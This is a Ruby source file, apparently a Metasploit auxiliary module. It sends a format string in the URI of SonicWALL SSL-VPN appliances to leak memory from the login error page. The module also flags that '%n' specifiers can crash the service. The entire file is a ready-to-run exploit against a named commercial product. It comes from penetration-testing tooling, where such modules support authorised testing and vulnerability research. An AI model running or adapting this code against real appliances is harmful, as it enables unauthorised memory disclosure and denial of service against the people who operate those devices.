##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
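class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.

  # Longest FORMAT value the module accepts. The description records a
  # 127-byte limit on the appliance side; two bytes are reserved for END_MARKER.
  MAX_FORMAT_LENGTH = 125

  # Appended to the format string so the end of the echoed data can be located.
  END_MARKER = 'XX'

  # The appliance reflects the expanded format string inside the login error
  # cell; the capture is everything up to END_MARKER. Ruby's `m` flag already
  # lets `.` span newlines, so the Perl-style `s` flag of the original pattern
  # (which in Ruby pins a regexp to the Windows-31J encoding) is omitted.
  LEAK_PATTERN = %r{<td class="loginError">(.+)#{END_MARKER}}im

  # Module metadata and options. URI is the request path the format string is
  # appended to; FORMAT is the user-supplied format string; SSL defaults on
  # with RPORT 443.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonicWALL SSL-VPN Format String Vulnerability',
        'Description' => %q{
          There is a format string vulnerability within the SonicWALL
          SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory
          can be read or written to, depending on the format string used.
          There appears to be a length limit of 127 characters of format
          string data. With physical access to the device and debugging,
          this module may be able to be used to execute arbitrary code remotely.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '35145' ],
          [ 'OSVDB', '54881' ],
          [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],
        ],
        'DisclosureDate' => '2009-05-29',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),
      OptString.new('FORMAT', [ true, 'Format string (i.e. %x, %s, %n, %p etc)', '%x%x%x%x%x%x%x' ]),
      Opt::RPORT(443),
      OptBool.new('SSL', [true, 'Use SSL', true]),
    ])
  end

  # Sends a single request carrying FORMAT plus END_MARKER in the URI and
  # reports whatever the appliance echoes back between the login error cell
  # and the marker. Connection-level failures are reported, not raised.
  #
  # @return [void]
  def run
    # The marker adds two bytes, so the user-supplied part is capped below 127.
    if datastore['FORMAT'].length > MAX_FORMAT_LENGTH
      print_error('FORMAT string length cannot exceed 125 bytes.')
      return
    end

    fmt = datastore['FORMAT'] + END_MARKER

    begin
      res = send_request_raw({
        'uri' => normalize_uri(datastore['URI']) + fmt
      })

      if res && (res.code == 200)
        # Report only when the marker was actually found; the earlier
        # scan/last_match pairing printed an empty "leaked" line on no match.
        leak = res.body.match(LEAK_PATTERN)
        print_status("Information leaked: #{leak[1]}") if leak
      end

      print_status("Request sent to #{rhost}:#{rport}")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Couldn't connect to #{rhost}:#{rport}")
    rescue ::Timeout::Error, ::Errno::EPIPE => e
      vprint_error(e.message)
    end
  end
end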